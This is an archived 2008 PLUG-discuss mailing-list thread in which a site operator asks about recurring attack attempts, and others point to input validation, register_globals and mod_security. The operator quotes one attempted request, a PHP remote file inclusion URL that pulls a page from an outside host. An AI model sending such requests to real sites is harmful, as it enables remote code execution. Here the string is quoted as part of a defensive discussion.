RE: OT: Website Exploits

Top Page
This message is part of the following thread:
Mthe complete thread tree sorted by date
MBob Elzer at <-
Mkeith smith at ->
Attachments:
Message as email
+ (text/plain)
+ (text/html)
+ (text/plain)
Delete this message
Reply to this message
Author: Lisa Kachold
Date:  
To: klsmith2020, plug-discuss
Subject: RE: OT: Website Exploits

What index.php are you using? Is this WordPress?http://archive.cert.uni-stuttgart.de/bugtraq/2007/03/msg00030.htmlThere are many php exploits: http://archive.cert.uni-stuttgart.de/bugtraq/2007/03/msg00031.htmlwww.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
http://www.urbandictionary.com/define.php?term=obnosis (503)754-4452Catch the January PLUG HackFest! Kristy Westphal, CSO for the Arizona Department of Economic
Security will provide a one hour
presentation on forensics.Date: Wed, 3 Dec 2008 14:57:35 -0800From: : Re: OT: Website ExploitsTo: you for the heads up on mod_security. I'm not sure if that is installed or not.Thanks again!------------------------Keith Smith--- On Wed, 12/3/08, JD Austin <> wrote:From: JD Austin <>Subject: Re: OT: Website ExploitsTo: , "Main PLUG discussion list" <>Date: Wednesday, December 3, 2008, 3:48 PMThat is a fairly common tactic. It exploits poor input validation and register globals in PHP.Do yourself a huge favor and install mod_security (I assume you're using apache?)as an extra measure of
security if you haven't already.
On Wed, Dec 3, 2008 at 3:39 PM, keith smith <> wrote:

Hi,I am working on a website that gets a lot of exploit attempts.They mostly look like this: /index.php?display=http://humano.ya.com/mysons/index.htm?
Our code is set to disregard any value that is not expected. I'm wondering if there is a clearing house for reporting this type of stuff. I have the IP address as reported.... if that is accurate.
Thanks in advance!Keith 



      ---------------------------------------------------
PLUG-discuss mailing list - 
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
---------------------------------------------------PLUG-discuss mailing list -  subscribe, unsubscribe, or to change your mail settings:http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
_________________________________________________________________
Send e-mail anywhere. No map, no compass.
http://windowslive.com/Explore/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_anywhere_122008
---------------------------------------------------
PLUG-discuss mailing list -
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
This message was posted to the following mailing lists:
Plug Discuss
Mailing List Info | Nearby Messages		<-Re: REMINDER: OpenStreetMap Phoenix Mapping Party 12/6 & 12/7Re: REMINDER: OpenStreetMap Phoenix Mapping Party 12/6 & 12/7->
Some Mailing List Archive administrated by UnconfiguredLurker (version 2.3)